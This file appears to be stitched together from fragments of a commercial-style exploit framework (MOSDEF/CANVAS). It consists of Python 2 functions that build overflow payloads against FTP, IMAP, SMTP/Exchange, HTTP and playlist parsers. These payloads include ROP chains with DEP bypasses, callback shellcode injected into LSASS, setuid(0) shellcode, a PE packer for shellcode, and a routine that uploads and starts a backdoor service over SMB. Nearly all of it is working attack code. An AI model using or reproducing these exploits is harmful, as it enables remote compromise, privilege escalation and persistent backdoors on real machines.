def createRemoteLibc(self): ndx = 0 libc = [] libc_buffer = [] import mosdef BASE_ADDRESS = 0x60400000L # just some random address that we expect not # to be remotely mmaped self.compilelibc = 1 for ke in self.localfunctions.keys(): suffixtype = self.localfunctions[ke][0] suffixcode = self.localfunctions[ke][1] if suffixtype == "asm": buf = mosdef.assemble(suffixcode, self.arch) elif suffixtype == "c": code = "jump %s\n" % ke code += mosdef.compile_to_IL(suffixcode, {}, self, None, not_libc=0) code = self.compile_to_ASM(code) buf = mosdef.assemble(code, self.arch) # IMPORTANT: never forget to clearfunctioncache else: continue libc.append("libc!" + ke) self.remotefunctioncache["libc!" + ke] = ndx + BASE_ADDRESS libc_buffer.append(buf) ndx += len(buf) self.clearfunctioncache() self.compilelibc = 0 libc_buffer = "".join(libc_buffer) # mapping the libc self.log("Remote libc size: 0x%08x" % ndx) ret = self.mmap(addr=BASE_ADDRESS, needed=ndx) if ret == 0xFFFFFFFFL: raise Exception, "Failed to mmap libc at address 0x%08x with size: %d" % ( BASE_ADDRESS, ndx) self.remoterecv(self.fd, ret, ndx, libc_buffer) self.log("MOSDEF libc mapped at address: 0x%08x" % ret) # Instead of patching, everything, i can try to mmap at a know address, # in case it doesn't work, i can re patch with the given address. if ret != BASE_ADDRESS: self.log("Repatching the remotelibc") for ke in libc: self.remotefunctioncache[ ke] = self.remotefunctioncache[ke] - BASE_ADDRESS + ret
def makesploit(self): """ Construct the attack """ ver = self.versions[self.version] #self.log("Size of shellcode: 0x%x" % len(self.encodedsearchcode) ) if self.version == 1: import mosdef code = mosdef.assemble( "movl 0x74(%esp), %eax\n subl $-0xb7, %eax \n call %eax", "X86") #self.encodedsearchcode = "A" * len(self.encodedsearchcode) stack = intel_order(ver[2]) + code + self.encodedsearchcode #elif self.version == 2: # retn : intel_order(0x629c127a) #stack = intel_order(0x5ad7ab6a) + intel_order(0x7cb5ba82) + intel_order(0x7c91d3f8) + "A" * 0x100 #stack += "\xff\xff\xff\xff" + "B" * 0x100 #stack = "A" * 0x200 #+ "A" * 0x54 + intel_order(0x77e3762b) + shellcode #stack = "COCA" + "B" * 0x100 + "C" * 0x100 + "D" * 0x100 #self.log("Attacking version %s" % info) self.log("Encode search code: %d" % len(self.encodedsearchcode)) sploitstring = "LIST C " + "B" * ver[1] + stack + "\r\n" return sploitstring
def write4(self,what, where, myself, size): self.s = self.gettcpsock() # socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) try: self.s.connect( (self.host, self.port)) except: self.log("Could not connect") return 0 # size DOES matter :> self.s.send(struct.pack("!L", size)) buf = "" buf += "AA" + chr(0xff) + "A" # Stupid Pointer that trigger Microsoft's bug (tm) buf += struct.pack("!L", myself) self.log("Guessing what: 0x%08x where: 0x%08x myself: 0x%08x with size: 0x%x" % (what, where, myself, size)) # WHERE - 0x48 write4buf ="" write4buf += struct.pack("L", where-0x48)*9 # value must be -0x48 # WHAT write4buf += struct.pack("L", what) *13 # 16 bytes long #buf+= write4buf * (0x2E8*2) buf += write4buf * ( (size*5/8)/len(write4buf)) jmp=mosdef.assemble("jmp $0x6B", "X86") buf += jmp * ( (size - len(buf) - len(self.shellcode)-0x6c) /len(jmp)) buf += "H" * 0x6C + "A" * ((size - len(buf) - len(self.shellcode)-0x6c) % len(jmp)) buf += self.shellcode # SHELLCODE :> self.s.send(buf)
def makesploit(self): """ Construct the attack """ EIP = intel_order(self.versions[self.version][1]) EIPLOC = self.versions[self.version][2] SHELLOC = self.versions[self.version][3] jmpnum = SHELLOC - (EIPLOC + 4 + 8 ) #calculate how far back we have to jmp #is this going to cause problems with Python 2.4? jmpbackcode = "jmp $0x%8.8x" % uint32(jmpnum) jmpback = mosdef.assemble(jmpbackcode, "X86") print "jmpback: %s" % hexprint(jmpback) #controls the stack overflow attackstring = "A" * 0x3ff attackstring = stroverwrite(attackstring, self.encodedsearchcode, 20) attackstring = stroverwrite(attackstring, "\xeb\x04", EIPLOC - 2) attackstring = stroverwrite(attackstring, EIP, EIPLOC) attackstring = stroverwrite(attackstring, jmpback, EIPLOC + 4) #{{S,S,S},I,{{S,S},S,S,I,S,S,S,({S,S}),B,({S,S,I})},I,S,I,B,B,B,B,B} request = "{{`A`,`DEFG`,`EGQE`},2,{{`A`,`" + attackstring + "`},`A`,`A`,4,`A`,`a`,`A`,({`a`,`a`}),1,({`A`,`a`,4})},2,`a`,3,1,1,1,1,1}" #there is some really buggy code in the program that does an atoi on the first 16 bytes you send it #however, they don't null terminate your string, so you end up atoiing <your string><some random pointer> #which is crazy and so we have to work around it by only using 15 bytes and adding a space sploitstring = "%15s " % (len(request)) sploitstring += request #self.log("Sending: %s"%sploitstring) return sploitstring
def makesploit(self): """ Construct the attack """ ver = self.versions[self.version] #self.log("Size of shellcode: 0x%x" % len(self.encodedsearchcode) ) if self.version == 1: stack = intel_order( ver[ 1 ] ) + "A" * 0x8 + self.shellcode elif self.version == 2: # addies: info, addy1, addy2, addy3, addy4 = ver # addy1: mov al,1 / ret # addy2: push %esp/ pop %ebp / ret 18 # addy3: anti dep trick # addy4: jmp %esp import mosdef code = mosdef.assemble("jmp 0x2a", "X86") stack = intel_order(addy1) + "\xff\x42\xff\x42" + intel_order(addy2) + intel_order( addy2 + 2 ) stack+= intel_order(addy4) + "AAAA" + code + "A"*0xe + intel_order(addy3) + "A" * 0x20 + self.shellcode #self.log( "Encode search code: %d" % len(self.encodedsearchcode) ) sploitstring = "SIZE //" + "B" * (512+13) + stack + "\r\n" return sploitstring
def makesploit(self): """ Construct the attack """ ver = self.versions[self.version] #self.log("Size of shellcode: 0x%x" % len(self.encodedsearchcode) ) if self.version == 1: stack = intel_order(ver[1]) + "A" * 0x10 + self.shellcode elif self.version == 2: info, addy1, addy2, addy3, addy4, addy5 = ver # Five different ret into lib address are needed for this special exploit: # The first one set ESP = EBP, and then do a retn 0x18 # The second one put 1 into AL # The 3rd one, increase ESP even more by doing a retn 0xc # The 4rd one, the anti-DEP trick (which muck up the stack a lil bit) # The 5th one, is the jmp ESP which end up landing at our "jmp $0x22", and that jumps exactly into our shellcode import mosdef jmp = mosdef.assemble("jmp $0x22", "X86") stack = intel_order(addy1) + "\xff\xff\xff\xff" * 4 + intel_order( addy2) stack += intel_order(addy5) + "AAAA" + jmp + "A" * 0xe stack += intel_order(addy3) + intel_order(addy4) stack += "ABCD" * 3 + self.shellcode self.log("Attacking version %s" % info) sploitstring = "USER " + "B" * (0xe3 - 0xc) + stack + "\r\n" return sploitstring
def makesploit(self): """ Construct the attack, imail will tack \Users on the end of the string """ geteip = self.versions[self.version][1] #jump back to just before some corrupted data using this writable address offset = 492 sploitstring = "BBBB" + "A" * (700 - 4) writeoff = 500 writeable = 0x7ffdf164 #keep this far away from the real PEB jmpoff = 676 if len(self.shellcode) > jmpoff: self.log("Serious error: Shellcode length is > offset") import mosdef jmpstr = mosdef.assemble("jmp $-%d\n" % (jmpoff + 5), "X86") if hasbadchar(jmpstr, self.badstring): self.log("Warning: Bad char detected in jmpstr") print "jmpstr = %s" % hexprint(jmpstr) sploitstring = stroverwrite(sploitstring, self.shellcode, 0) sploitstring = stroverwrite(sploitstring, intel_order(geteip), offset) sploitstring = stroverwrite(sploitstring, intel_order(writeable), writeoff) sploitstring = stroverwrite(sploitstring, jmpstr, jmpoff) return "001 LOGIN \":%s\" \"password\"\r\n" % sploitstring
def createxPacket1(self): buf = '' buf+="rcpt to: <" buf+= "A" * 4098 buf+=mosdef.assemble("jmp $8", "X86") self.info,self.eip = targets[self.version] buf+= intel_order(self.eip) buf+= "\x90" * 10 buf+=self.createShellcodexPacket1() buf+= "C" * 2000 buf+="\n" return buf
def createxPacket1(self): buf = '' buf += "GET / HTTP/1.0\r\n" buf += "Host: 127.0.0.1: " buf += "A" * (2 + 5 * 4) buf += "\x90" * 2 buf += mosdef.assemble("jmp $8", "X86") buf += intel_order(0x602012bc) buf += "\x90" * 10 buf += self.createShellcodexPacket1() buf += "A" * 0x200 buf += "\r\n\r\n" return buf
def createShellcodexPacket1(self): badstring = self.xpacket1badchars self.shellcode = self.createWin32Shellcode(badstring, self.localhost, self.localport) # we include an esp adjust before the encoder # avoiding nul bytes adjust = mosdef.assemble( "xorl %eax,%eax\nmovb $0x10,%ah\nsubl %eax,%esp\n", "X86") for c in badstring: if c in adjust: print "[!] BAD CHAR IN ADJUST STUB!" self.shellcode = adjust + self.shellcode return self.shellcode
def createShellcode(self): setids = """ xorl %eax,%eax xorl %ebx,%ebx movb $23,%al // setuid(0) int $0x80 xorl %eax,%eax xorl %ebx,%ebx movb $23,%al // setuid(0) .. have to do it twice for some wacky reason int $0x80 xorl %eax,%eax xorl %ebx,%ebx movb $46,%al int $0x80 // setgid(0) """ self.shellcode = mosdef.assemble( setids, "X86") + self.createLinuxGOShellcode('') return self.shellcode
def createxPacket1(self): buf = '' buf += "[playlist]\n" buf += "File1=\\\\" shellcode = self.createShellcodexPacket1() buf += "A" * (1022 - len(shellcode)) buf += shellcode #buf += intel_order(0x773D10A4) #jmp esp @ shell32 EN (XP SP1) #buf += intel_order(0x773A4540) #jmp esp @ shell32 ES (XP SP0) buf += intel_order(0x779DD57F) #jmp esp @ shell32 ES/ES (XP SP0-SP1) buf += mosdef.assemble("jmp $-%d" % (5 + 4 + len(shellcode)), "X86") # 5 bytes for relative jmp itself buf += "C" * 24 buf += "\nTitle1=VSPLOIT" buf += "\nLength1=FFF\nNumberOfEntries=1\nVersion=2" return buf
def createShellcode(self): host = self.callback.ip port = self.callback.port self.localhost = host self.localport = port sc = shellcodeGenerator.win32() shellcode = self.createHeapSafeInjectIntoProcess( self.badstring, host, port, smallcode=0, processname="LSASS.EXE") import mosdef # GET EIP, MOV "ret", -0x10(%eip) selfmodify = "\xe8\xff\xff\xff\xff\xc3\x5f" + mosdef.assemble( "movl $0x4141feeb, -0x10(%edi)", "X86") self.shellcode = "\x42" * 0x50 + selfmodify + shellcode self.log("length of real shellcode: %d" % (len(self.shellcode))) return self.shellcode
def MemLeak(self, size): try: s = smtplib.SMTP(self.host, self.port) except: self.log("Could not connect for memleak...") return 0 s.sock.set_timeout(20) s.ehlo() if not s.has_extn("XEXCH50"): return 0 s.docmd("MAIL FROM: Administrator") s.docmd("RCPT TO: Administrator") s.docmd("XEXCH50 %d 2" % size) size = size - 2 opcode = mosdef.assemble("jmp $0x41", "X86") buf = opcode * ( (size - len(self.shellcode)) / len(opcode)) + self.shellcode buf += "Z" * (len(buf) % len(opcode)) s.docmd(buf) return 1
def createMOSDEFPE(self, filename, code, vars={}): from win32peresolver import win32peresolver # shellcode, importante=[ ("advapi32.dll", ["RevertToSelf"])] ): # Mixing MOSDEF with PElib. # Concerning Mosdef: # Basically, we have a win32peresolver that pass some fixed address (that would be our PE PLT) # and thats returned to the compile code. The win32peresolver put all this address on a cached. # # Concerning PE # First of all, we need to compile before everything, cause we need the list of imported functions # So, we send mosdef a hardcoded address(0x401A0) offset: 0x1A0 which is where the .text section start. # At that address, will be our PLT (jmp *(IAT_entry)), so we have to point the Entry Address to # .code + function_number * sizeof(jmp *(IAT_entry)). So we land on the begging on the shellcode. # # To discover where the IAT would be (we need to know this, before creating the PLT), we need to calculate # where the First thunk # # buf+= secondpad # buf+= data_buf # # for a in imports: # buf+= a[0].raw() # buf+= import_str # # # ORIGINAL THUNK # for a in IIBN: # for b in a: # Listing function # buf+=struct.pack("L",b[1]) # buf+=struct.pack("L",0x0) # # FIRST THUNK # for a in IIBN: # for b in a: # Listing function # buf+=struct.pack("L",b[1]) # buf+=struct.pack("L",0x0) # side note: .code must be aligned image_base = 0x40000 plt_len = len(mosdef.assemble("jmp *(0x01020304)", "X86")) plt_entry = 0x1A0 + image_base w = win32peresolver(plt_entry) w.setPLTEntrySize(plt_len) shellcode = w.compile(code, vars) # We need to pass the functioncache[func] = address into [ ("advapi32.dll", ["RevertToSelf"])] format # Yeah, probably you can do it better or with one fancy python line dll = {} func_by_addr = {} functions_num = 0 for a in w.remotefunctioncache.keys(): s = a.split("|") if dll.has_key(s[0]): dll[s[0]].append(s[1]) else: dll[s[0]] = [s[1]] functions_num += 1 func_by_addr[a] = w.remotefunctioncache[a] importante = [] for a in dll.keys(): importante.append((a, dll[a])) shellcode = "\x90" * (plt_len * functions_num) + shellcode # So, by now we have important in the fancy format [ ('dll name', ['functions'] ) ] # And also, func_by_addr = {dllname!function]: function_plt }, and also functions_num has the size of functions idx = 0 # MZ mz = MZ() mz.e_lfanew = mz.getSize() idx += mz.getSize() # PE Image Header imgHdr = IMGhdr() imgHdr.Machine = 0x014C # i386 imgHdr.NumberOfSections = 0x2 # Code and data for now (Maybe we can do it only one) imgHdr.Characteristics = 0x0102 # Executable on 32-bit machine idx += imgHdr.getSize() + 4 # for PE_MAGIC # Optional Header imgOpt = IMGOPThdr() imgOpt.SectionAlignment = 0x20 # Thats our aligment imgOpt.FileAlignment = 0x20 imgOpt.MajorOperatingSystemVersion = 0x4 # NT4.0 imgOpt.MajorSubsystemVersion = 0x4 # Win32 4.0 imgOpt.Subsystem = 0x3 imgOpt.SizeOfStackReserve = 0x100000 imgOpt.SizeOfStackCommit = 0x1000 imgOpt.SizeOfHeapReserve = 0x100000 imgOpt.SizeOfHeapCommit = 0x1000 imgOpt.NumberOfRvaAndSizes = 0x10 idx += imgOpt.getSize() # Directories directories = [] for a in range(0, imgOpt.NumberOfRvaAndSizes): directories.append(Directory()) idx += directories[0].getSize() * 16 # .code section code = Section() code.Name = ".text" code.Characteristics = 0x60000020L # Code | Executable | Readable idx += code.getSize() # .data section data = Section() data.Name = ".data" data.Characteristics = 0xC0000040L # Initialized | Readable | Writeable idx += data.getSize() code_offset = self.align(idx, imgOpt.FileAlignment) firstpad = "\0" * (code_offset - idx) idx = code_offset # we can fill data_buf with our data and that will be loaded into mem :> idx += len(shellcode) data_offset = self.align(idx, imgOpt.FileAlignment) secondpad = "\0" * (data_offset - idx) idx = data_offset data_buf = "" idx += len(data_buf) # Creating the list of ImportDescriptors import_offset = idx imports = [] ndx = 0 import_str = "" for a in importante: i = ImportDescriptor() i.ForwarderChain = 0xFFFFFFFFL imports.append((i, ndx)) ndx += len(a[0] + "\0") # We put on NDX, an index of the name string, so at the end # to find a string, we will do import_str_offset + this_index import_str += a[0] + "\0" # Collecting dll names # The final importdescriptor imports.append((ImportDescriptor(), 0)) idx += i.getSize() * len(imports) import_str_offset = idx idx += len(import_str) off = self.align(idx, imgOpt.FileAlignment) import_str += "\0" * (off - idx) idx = off # Original Thunks original_thunks_offset = idx original_thunk = [] for a in importante: original_thunk.append(idx) idx += len(a[1]) * 4 + 4 # First thunk offset first_thunks_offset = idx first_thunk = [] plt_ndx = 0x1A0 for a in importante: first_thunk.append(idx) for b in a[1]: dupla = "%s|%s" % (a[0], b) if not func_by_addr.has_key(dupla): raise PEError, "Error on Thunk" func_by_addr[func_by_addr[dupla]] = "jmp *(0x%08x)\n" % (idx + image_base) idx += 4 idx += 4 # crafting a PLT PLT = "" for a in range(plt_entry, plt_entry + plt_len * functions_num, plt_len): if not func_by_addr.has_key(a): raise PEError, "func_by_addr doesn't have a PLT address (%x)" % a PLT += mosdef.assemble(func_by_addr[a], "X86") shellcode = PLT + shellcode[plt_len * functions_num :] print "Shellcode size (with PLT): %d" % len(shellcode) # Creating IIBN IIBN = [] for a in importante: tbl = [] IIBN.append(tbl) for b in a[1]: iibn = ImageImportByName() iibn.Name = b # "RevertToSelf" iibn.Hint = 1 tbl.append((iibn, idx)) idx += iibn.getSize() endpad = "\0" * (self.align(idx, imgOpt.FileAlignment) - idx) # Filling the gaps imgOpt.SizeOfCode = len(shellcode) + len(secondpad) imgOpt.BaseOfCode = code_offset # Entry point = code_offset + PLT_entry size imgOpt.AddressOfEntryPoint = code_offset + plt_len * functions_num imgOpt.BaseOfData = data_offset imgOpt.ImageBase = image_base imgOpt.SizeOfInitializedData = 0x20 imgOpt.SizeOfImage = 0xC # imgOpt.SizeOfHeaders = code_offset imgOpt.NumberOfRvaAndSizes = 0x10 # Import Directory directories[1].VirtualSize = directories[1].Size = idx - import_offset directories[1].VirtualAddress = import_offset # code and data code.VirtualAddress = code_offset code.VirtualSize = code.SizeOfRawData = imgOpt.SizeOfCode code.PointerToRawData = code_offset data.VirtualAddress = data_offset data.VirtualSize = data.SizeOfRawData = idx - data_offset # len(data_buf) data.PointerToRawData = data_offset imgOpt.SizeOfImage = idx # # Fixing imports with thunk info for a in range(0, len(imports) - 1): imports[a][0].OriginalFirstThunk = original_thunk[a] imports[a][0].FirstThunk = first_thunk[a] imports[a][0].Name = import_str_offset + imports[a][1] # RAWing... buf = mz.raw() + struct.pack("L", PE_MAGIC) + imgHdr.raw() + imgOpt.raw() for a in directories: buf += a.raw() buf += code.raw() buf += data.raw() buf += firstpad buf += shellcode buf += secondpad buf += data_buf for a in imports: buf += a[0].raw() buf += import_str # ORIGINAL THUNK for a in IIBN: for b in a: # Listing function buf += struct.pack("L", b[1]) buf += struct.pack("L", 0x0) # FIRST THUNK for a in IIBN: for b in a: # Listing function buf += struct.pack("L", b[1]) buf += struct.pack("L", 0x0) # IIBN for a in IIBN: for b in a: buf += b[0].raw() buf += endpad # Done, dumping to a file f = open(filename, "wb") f.write(buf) f.close() return len(buf)
def install_service(self, smb,\ servicename='MOSDEFService',\ displayname='MOSDEF Service',\ binaryname='mosdefservice.exe',\ port=1234, \ password='******'): import mosdef # prepare service binary self.log('Using port %d and password %s' % (port, password)) sourcefile = 'backdoors/mosdefservice.exe' try: data = file(sourcefile, 'rb').read() except: self.log('Could not read service binary') return False self.log('Using port %d for MOSDEFService' % port) data = data.replace(mosdef.assemble('push $5555', 'X86'),\ mosdef.assemble('push $%d' % port, 'X86')) oldpassword = '******'*16 + 'B'*16 # pad password to 32 bytes data = data.replace(oldpassword, password + '\x00'*(32-len(password))) sourcefile = sourcefile + '.port_%d' % port destfile = binaryname try: file(sourcefile, 'wb+').write(data) except: self.log('Could not write service binary') return False smb_upload = self.engine.getModuleExploit('upload') smb_service = self.engine.getModuleExploit('installremotemosdefservice') smb_service.link(self) smb.treeconnect('ADMIN$') vfs = self.get_smb_node(smb) smb_upload.link(self, nodes=[vfs]) smb_upload.argsDict['source'] = sourcefile smb_upload.argsDict['destfilename'] = destfile if not smb_upload.run(): self.log('Could not upload trojan binary!') return False else: self.log('Uploaded trojan binary (%s) to %s' % (sourcefile, destfile)) # connect to the pipe if not smb.pipeconnect('\\svcctl'): self.log('Could not connect to service control pipe!') return False self.log('Connected to service control pipe ...') # bind if not smb.dcebind('367abb81-9844-35f1-ad32-98f038001003', 2, 0, 0): self.log('Could not bind to UUID!') return False self.log('Bound to UUID ...') # we already connected our SMB session, so we just set SMB and KEYWORD auth_type = libdcerpc.RPC_C_AUTHN_NONE if self.covertness < 2 else libdcerpc.RPC_C_AUTHN_WINNT auth_level = libdcerpc.RPC_C_AUTHN_LEVEL_DEFAULT if self.covertness < 2 else libdcerpc.RPC_C_AUTHN_LEVEL_PKT_PRIVACY smb_service.myDCE = libdcerpc.DCERPC(u'ncacn_np:127.0.0.1[\\svcctl]', self.gettcpsock()) smb_service.myDCE.bind(u'367abb81-9844-35f1-ad32-98f038001003', u'2.0', auth_type=auth_type, auth_level=auth_level) #smb_service.myDCE.mysmb = smb #smb_service.myDCE.keyword = 'ncacn_np' from win32MosdefShellServer import SC_MANAGER_CREATE_SERVICE from win32MosdefShellServer import SERVICE_WIN32_OWN_PROCESS from win32MosdefShellServer import SERVICE_AUTO_START from win32MosdefShellServer import SERVICE_ERROR_IGNORE from win32MosdefShellServer import SERVICE_ALL_ACCESS from win32MosdefShellServer import SERVICE_BOOT_START from win32MosdefShellServer import SERVICE_AUTO_START pkt = smb_service.createOpenSCMPkt(accessmask=SC_MANAGER_CREATE_SERVICE) self.log("OpenSCManager sending %d bytes" % len(pkt)) smb_service.myDCE.call(15, pkt, response=True) ret=smb_service.myDCE.reassembled_data success,policy_handle = smb_service.parseOpenSCMPkt(ret) if not success: self.log('Could not parseOpenSCMPkt!') return False self.log('We have a policy handle! Yay!') desiredaccess = SERVICE_ALL_ACCESS atype = SERVICE_WIN32_OWN_PROCESS errorcontrol = SERVICE_ERROR_IGNORE starttype = SERVICE_AUTO_START binarypath = '%SYSTEMROOT%\\' + destfile self.log('Binary path: %s' % binarypath) loadorder = 0 dependencies = None password = None ret = smb_service.CreateService(policy_handle,\ servicename,\ displayname,\ desiredaccess,\ atype,\ starttype,\ errorcontrol,\ binarypath,\ loadorder,\ dependencies,\ servicename,\ password) if ret not in [0,0x431]: self.log('Was unable to call CreateService!') return False self.log('Called create service successfully: %x ...' % ret) ret,handler = smb_service.OpenService(policy_handle,\ servicename,\ SERVICE_ALL_ACCESS) if ret not in [0]: self.log('Was unable to call OpenService!') return False ret = smb_service.StartService(handler) if not ret: self.log('Great MOSDEF success waiting on port %d!' % port) else: self.log('There was an error starting the MOSDEF service!') return False ret = smb_service.CloseServiceHandle(handler) ret = smb_service.CloseServiceHandle(policy_handle) return True
def assemble(self, code): return mosdef.assemble(self.preprocess(code), self.arch)